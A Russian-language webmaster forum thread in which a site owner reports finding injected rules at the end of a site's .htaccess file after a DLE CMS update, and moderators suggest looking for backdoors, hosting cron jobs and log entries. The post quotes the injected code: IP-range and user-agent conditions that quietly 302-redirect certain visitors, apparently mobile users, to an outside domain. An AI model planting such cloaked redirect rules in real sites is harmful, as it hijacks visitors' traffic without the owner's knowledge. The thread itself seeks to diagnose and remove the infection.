Jump to content

Recommended Posts

Странную вещь обнаружил на одном из своих сайтов. В файле htaccess в самом конце нашёл вот это:

---------------------------------------------

RewriteEngine on

RewriteCond %{REMOTE_ADDR} ^217\.118\.95\.(9[6-9]|1([0-1][0-9]|2[0-7]))$ [NC,OR]

RewriteCond %{REMOTE_ADDR} ^217\.118\.95\.(6[4-9]|[7-8][0-9]|9[0-5])$ [NC,OR]

RewriteCond %{REMOTE_ADDR} ^85\.115\.248\.(1(2[8-9]|[3-9][0-9])|2([0-4][0-9]|5[0-5]))$ [NC,OR]

RewriteCond %{REMOTE_ADDR} ^85\.115\.248\.([0-9]|[1-9][0-9]|1([0-1][0-9]|2[0-7]))$ [NC,OR]

RewriteCond %{REMOTE_ADDR} ^89\.188\.224\.(1(3[6-9]|4[0-3]))$ [NC,OR]

RewriteCond %{REMOTE_ADDR} ^85\.115\.248\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$ [NC,OR]

... и ещё штук 500 аналогичных строк, а далее:

 

RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC]

RewriteCond %{HTTP_USER_AGENT} !bsd [NC]

RewriteCond %{HTTP_USER_AGENT} !x11 [NC]

RewriteCond %{HTTP_USER_AGENT} !unix [NC]

RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]

RewriteCond %{HTTP_USER_AGENT} !playstation [NC]

RewriteCond %{HTTP_USER_AGENT} !bot [NC]

RewriteCond %{HTTP_USER_AGENT} !libwww [NC]

RewriteCond %{HTTP_USER_AGENT} !msn [NC]

RewriteCond %{HTTP_USER_AGENT} !fdm [NC]

RewriteCond %{HTTP_USER_AGENT} !maui [NC]

RewriteCond %{HTTP_USER_AGENT} !webmoney [NC]

RewriteCond %{HTTP_USER_AGENT} !primeport [NC]

RewriteCond %{HTTP_USER_AGENT} !mxagent [NC]

RewriteCond %{HTTP_USER_AGENT} !greenbrowser [NC]

RewriteCond %{HTTP_USER_AGENT} !muncher [NC]

RewriteCond %{HTTP_USER_AGENT} !btwebclien [NC]

RewriteCond %{HTTP_USER_AGENT} !download [NC]

RewriteCond %{HTTP_USER_AGENT} !ipad [NC]

 

RewriteRule ^(.*)$ http://perchinka.me/?key=352970b073bfbc5 [L,R=302]

--------------------------------------------

Очевидно, идёт перенаправление для ряда IP-адресов на эту "перчинку". Но каким образом это сделано и куда копать? Остальные сайты на хостинге без изменений. Кстати, могу добавить, что недавно произвёл обновление CMS DLE на этом сайте с 10.0 до 10.3. Версия официальная, всё как положено.

Link to post
Share on other sites

Есть вопрос? Задай его профессиональным веб-мастерам, SEO и другим специалистам!

  • Модератор

Сайтов на хостинге несколько? Если да, то троян можен быть на любом сайте (вшит в какой нибудь php) и периодически перезаписывать htaccess у всех сайтов.

 

P.S. Как вариант, смотреть время изменения htaccess в логах сервера и смотреть: что и откуда берется.

Link to post
Share on other sites

Сайтов на хостинге несколько? Если да, то троян можен быть на любом сайте (вшит в какой нибудь php) и периодически перезаписывать htaccess у всех сайтов.

Сайтов на хостинге 5 штук. Все на лицензионной DLE 10.0. Проверил все. Чисты.

Link to post
Share on other sites
  • Модератор

Сайтов на хостинге 5 штук. Все на лицензионной DLE 10.0. Проверил все. Чисты.

А в cron ничего не прописано? И чем проверяли?

Link to post
Share on other sites

А в cron ничего не прописано?

Cron тоже обычный. Я его сейчас на всякий случай переименовал.

 

 

И чем проверяли?

Я имел в виду, что проверил все файлы htaccess у всех сайтов. Там всё чисто.

Link to post
Share on other sites

Ну дык заменить на стандартный и поставить права 444. А если на сервак залезли, то нужно что то менять)))

Да я думаю, что если б на сервак залезли, то все файлы htaccess переписали бы.

Link to post
Share on other sites
  • Модератор

Cron тоже обычный. Я его сейчас на всякий случай переименовал.

 

Я про cron в панели хостинга... htaccess также может перезаписываться банальным POST или GET запросом к какому-нибудь бекдору, спрятанном хоть в js файле. Поэтому нужно искать в логах время перезаписи htaccess и изучить запросы к сайту, ну или искать сами бекдоры... Например Айболитом http://revisium.com/ai/

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...